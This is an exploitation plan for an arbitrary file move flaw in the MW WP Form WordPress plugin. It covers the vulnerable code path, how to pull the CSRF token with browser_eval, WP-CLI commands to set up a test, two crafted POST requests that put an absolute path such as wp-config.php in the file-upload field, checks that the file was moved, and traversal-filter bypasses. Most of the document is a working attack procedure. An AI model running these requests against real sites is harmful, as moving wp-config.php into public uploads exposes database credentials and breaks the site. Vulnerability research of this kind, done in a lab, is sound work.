Exploitation Research Plan: CVE-2026-4347 (MW WP Form Arbitrary File Move)

1. Vulnerability Summary

The MW WP Form plugin (<= 5.1.0) is vulnerable to an Unauthenticated Arbitrary File Move vulnerability. The flaw exists because the MW_WP_Form_Directory::generate_user_filepath function uses the WordPress path_join() function to construct a file path using a user-supplied filename without ensuring the resulting path remains within the intended temporary directory.

Specifically, if an attacker provides an absolute path (e.g., /var/www/html/wp-config.php) as the filename, path_join() returns that absolute path directly, bypassing the intended directory prefix. The function's subsequent check for ../ is bypassed because absolute paths do not necessarily contain traversal sequences. The resulting arbitrary path is then passed to MWF_Functions::move_temp_file_to_upload_dir, which uses PHP's rename() function to move the target file to the public WordPress uploads directory.

2. Attack Vector Analysis

• Endpoint: Any WordPress page containing an MW WP Form shortcode.
• Vulnerable Action: The "Complete" step (final submission) of a form that includes a file upload field.
• Parameters:
  • mw-wp-form-form-id: The ID of the vulnerable form.
  • _token: A valid CSRF/session token for the form.
  • [field_name]: The name attribute of the file upload field, carrying the malicious absolute path.
• Preconditions:
  1. A form must exist with a file upload field ([mwform_file name="..."]).
  2. The "Saving inquiry data in database" option must be enabled for that form.
  3. A directory for the user's session must already exist in the temp upload folder (achieved by performing a legitimate upload in the first step).

3. Code Flow

1. Entry Point: A user submits the final step of a multi-step form (Confirm -> Complete transition).
2. Controller: The submission is handled, and because "Save in Database" is enabled, the plugin attempts to finalize uploaded files.
3. MW_WP_Form_Directory::generate_user_filepath($form_id, $name, $filename):
   • Calls generate_user_file_dirpath($form_id, $name) to get the base temp directory.
   • Validates that this directory exists: is_dir( $user_file_dir ) (This is why a dummy upload is required first).
   • Sink: $filepath = path_join( $user_file_dir, $filename );
   • If $filename is /var/www/html/wp-config.php, path_join returns /var/www/html/wp-config.php.
   • The check str_contains( $filepath, '../' ) passes because no traversal is used.
4. MWF_Functions::move_temp_file_to_upload_dir($filepath, ...):
   • Takes the returned $filepath.
   • Calculates a new destination in the standard WP uploads folder.
   • Sink: rename( $filepath, $new_filepath ) moves the arbitrary file.

4. Nonce/Token Acquisition Strategy

MW WP Form uses a _token parameter for session management and CSRF protection. This token is required to make the submission valid.

1. Identify the Form: Find a page containing an MW WP Form.
2. Extract Token:
   • Use browser_navigate to visit the form page.
   • The token is typically found in a hidden input field: <input type="hidden" name="_token" value="...">.
   • It may also be localized in JavaScript via mw_wp_form_js.
3. JavaScript Execution:

   // Use browser_eval to get the token from the hidden field
   browser_eval("document.querySelector('input[name=\"_token\"]').value")
   

5. Test Data Setup

1. Create Form:

   # Create a form with a file field
   FORM_ID=$(wp post create --post_type=mw-wp-form --post_title="Exploit Test" --post_status=publish --porcelain)
   
   # Add a file field and a submit button to the content
   wp post edit $FORM_ID --post_content='[mwform_file name="attachment"][mwform_submit name="submit" value="Send"]'
   
   # Enable "Save to Database" (stored in post meta)
   wp post meta set $FORM_ID mw-wp-form-database-save 1
   

2. Create Target File:

   echo "secret_data" > /var/www/html/secret.txt
   

3. Publish on Page:

   wp post create --post_type=page --post_title="Form Page" --post_status=publish --post_content="[mw-wp-form id='$FORM_ID']"
   

6. Exploitation Strategy

Step 1: Initialize Session and Create Temp Directory

Perform a legitimate upload to create the required directory structure under uploads/mw-wp-form_uploads/.

• Method: POST
• URL: /form-page/
• Body (Multipart):
  • mw-wp-form-form-id: $FORM_ID
  • _token: $TOKEN
  • attachment: dummy.txt (actual file upload)
  • mwform_submit: "Send" (triggers confirmation/input processing)

Step 2: Arbitrary File Move Injection

Submit the "Complete" request, replacing the expected filename with the absolute path of the target file.

• Method: POST
• URL: /form-page/
• Content-Type: application/x-www-form-urlencoded
• Body:
  • mw-wp-form-form-id: $FORM_ID
  • _token: $TOKEN
  • attachment: /var/www/html/secret.txt
  • mwform_submit: "Send"
  • __view_flg: complete (or equivalent parameter used to signal final step)

7. Expected Results

• The plugin will resolve the path to /var/www/html/secret.txt.
• The rename() function will move secret.txt from the WordPress root to a subdirectory within wp-content/uploads/YYYY/MM/.
• The secret.txt file will no longer exist in the root directory.
• The HTTP response may indicate a successful form submission.

8. Verification Steps

1. Check for File Absence:

   [ ! -f /var/www/html/secret.txt ] && echo "SUCCESS: File moved from root"
   

2. Locate Moved File:
   Search the uploads directory for the moved file:

   find /var/www/html/wp-content/uploads -name "secret.txt"
   

9. Alternative Approaches

If absolute paths are blocked by an environmental factor (like PHP open_basedir), try using ..// or ..\/ which may bypass simple str_contains(..., '../') checks while still resolving to a parent directory on certain OS/PHP combinations. Alternatively, if the target is wp-config.php, provide the path relative to the uploads directory if the number of steps up is known.